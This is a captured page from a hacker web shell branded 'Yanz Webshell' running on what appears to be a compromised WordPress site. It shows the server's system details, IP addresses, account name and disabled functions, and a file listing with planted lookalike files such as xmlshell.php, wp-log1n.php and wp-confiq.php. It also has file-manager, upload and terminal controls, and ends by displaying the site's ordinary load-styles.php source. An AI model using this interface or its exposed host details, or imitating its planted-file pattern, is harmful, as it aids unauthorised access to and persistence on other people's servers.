Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-14 18:11:26
2792.60 GB Free: 1880.63 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.89
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2025-11-28 13:13:32dr-xr-xr-xRename Touch
[ .. ]dir2025-12-11 23:22:37drwx--x--xRename Touch
[ .tmb ]dir2025-11-12 07:07:40drwxrwxrwxRename Touch
[ .well-known ]dir2025-11-12 07:07:35drwxr-xr-xRename Touch
[ 117cb ]dir2025-11-14 05:53:05dr-xr-xr-xRename Touch
[ 1d8b10 ]dir2025-11-14 08:28:52drwxr-xr-xRename Touch
[ cgi-bin ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ f4727b ]dir2025-11-19 07:48:55drwxr-xr-xRename Touch
[ images ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ wp-admin ]dir2025-11-26 03:07:13drwxr-xr-xRename Touch
[ wp-content ]dir2025-11-22 08:16:38drwxr-xr-xRename Touch
[ wp-includes ]dir2025-11-22 08:16:25drwxr-xr-xRename Touch
.htaccess1.13 KB2025-11-28 13:17:43-r-xr-xr-xRename Touch Edit Download
.htaccess.phpupgrader.574027731.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.9e97ffcf1.45 KB2023-08-02 18:50:37-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.initial1.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
click.php1.93 KB2023-09-14 08:16:25-r--r--r--Rename Touch Edit Download
defaults.php1.93 KB2023-07-21 03:50:14-r--r--r--Rename Touch Edit Download
ex.php5.96 KB2025-11-28 13:13:32-rw-r--r--Rename Touch Edit Download
header.php0 B2025-11-10 06:52:51-rw-r--r--Rename Touch Edit Download
index.php35.97 KB2023-05-29 08:16:38-r-xr-xr-xRename Touch Edit Download
index.php035.97 KB2023-09-11 08:16:37-rwxr-xr-xRename Touch Edit Download
item.php1.29 KB2023-08-18 08:15:39-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
mah.php1.93 KB2023-12-31 03:48:47-r--r--r--Rename Touch Edit Download
networks.php1.29 KB2024-01-13 03:43:18-r--r--r--Rename Touch Edit Download
options.php1.93 KB2023-12-03 08:16:25-r--r--r--Rename Touch Edit Download
pages.php1.44 KB2023-07-28 08:15:18-r--r--r--Rename Touch Edit Download
php.ini40 B2025-11-18 19:54:41-rw-r--r--Rename Touch Edit Download
plugins.php1.87 KB2023-07-01 08:16:25-r--r--r--Rename Touch Edit Download
product.php2.03 KB2023-04-16 03:50:14-r--r--r--Rename Touch Edit Download
quoys.php26.20 KB2025-11-13 01:08:41-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2025-09-30 22:02:04-rw-r--r--Rename Touch Edit Download
robots.txt364 B2023-06-15 08:16:38-r--r--r--Rename Touch Edit Download
search.php1.46 KB2023-12-19 08:16:38-r--r--r--Rename Touch Edit Download
track.php6.49 KB2025-11-12 04:05:52-rw-r--r--Rename Touch Edit Download
txets.php5.89 KB2025-11-12 06:13:57-rw-r--r--Rename Touch Edit Download
wp-activate.php7.21 KB2024-04-02 19:31:34-rw-r--r--Rename Touch Edit Download
wp-blog-header.php347 B2025-11-10 06:52:59-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2023-08-09 07:36:19-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
wp-config.php3.12 KB2022-02-15 07:01:10-rw-------Rename Touch Edit Download
wp-confiq.php0 B2025-11-10 06:52:50-rw-r--r--Rename Touch Edit Download
wp-cron.php5.51 KB2025-11-10 06:53:00-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-log1n.php1.72 KB2024-01-28 08:14:59-r--r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-settings.php29.38 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.98 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
xmlshell.php243.86 KB2025-11-13 16:26:34-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
User: kheruwym (1551)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/kheruwym/public_html/wp-admin/
Upload Files
File: /home/kheruwym/public_html/wp-admin/load-styles.php
<?php

/*
 * The error_reporting() function can be disabled in php.ini. On systems where that is the case,
 * it's best to add a dummy function to the wp-config.php file, but as this call to the function
 * is run prior to wp-config.php loading, it is wrapped in a function_exists() check.
 */
if ( function_exists( 'error_reporting' ) ) {
	/*
	 * Disable error reporting.
	 *
	 * Set this to error_reporting( -1 ) for debugging.
	 */
	error_reporting( 0 );
}

// Set ABSPATH for execution.
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __DIR__ ) . '/' );
}

define( 'WPINC', 'wp-includes' );
define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' );

require ABSPATH . 'wp-admin/includes/noop.php';
require ABSPATH . WPINC . '/theme.php';
require ABSPATH . WPINC . '/class-wp-theme-json-resolver.php';
require ABSPATH . WPINC . '/global-styles-and-settings.php';
require ABSPATH . WPINC . '/script-loader.php';
require ABSPATH . WPINC . '/version.php';

$protocol = $_SERVER['SERVER_PROTOCOL'];
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) {
	$protocol = 'HTTP/1.0';
}

$load = $_GET['load'];
if ( is_array( $load ) ) {
	ksort( $load );
	$load = implode( '', $load );
}

$load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load );
$load = array_unique( explode( ',', $load ) );

if ( empty( $load ) ) {
	header( "$protocol 400 Bad Request" );
	exit;
}

$rtl            = ( isset( $_GET['dir'] ) && 'rtl' === $_GET['dir'] );
$expires_offset = 31536000; // 1 year.
$out            = '';

$wp_styles = new WP_Styles();
wp_default_styles( $wp_styles );

$etag = $wp_styles->get_etag( $load );

if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $etag ) {
	header( "$protocol 304 Not Modified" );
	exit;
}

foreach ( $load as $handle ) {
	if ( ! array_key_exists( $handle, $wp_styles->registered ) ) {
		continue;
	}

	$style = $wp_styles->registered[ $handle ];

	if ( empty( $style->src ) ) {
		continue;
	}

	$path = ABSPATH . $style->src;

	if ( $rtl && ! empty( $style->extra['rtl'] ) ) {
		// All default styles have fully independent RTL files.
		$path = str_replace( '.min.css', '-rtl.min.css', $path );
	}

	$content = get_file( $path ) . "\n";

	// Note: str_starts_with() is not used here, as wp-includes/compat.php is not loaded in this file.
	if ( 0 === strpos( $style->src, '/' . WPINC . '/css/' ) ) {
		$content = str_replace( '../images/', '../' . WPINC . '/images/', $content );
		$content = str_replace( '../js/tinymce/', '../' . WPINC . '/js/tinymce/', $content );
		$content = str_replace( '../fonts/', '../' . WPINC . '/fonts/', $content );
		$out    .= $content;
	} else {
		$out .= str_replace( '../images/', 'images/', $content );
	}
}

header( "Etag: $etag" );
header( 'Content-Type: text/css; charset=UTF-8' );
header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' );
header( "Cache-Control: public, max-age=$expires_offset" );

echo $out;
exit;
@ Telegram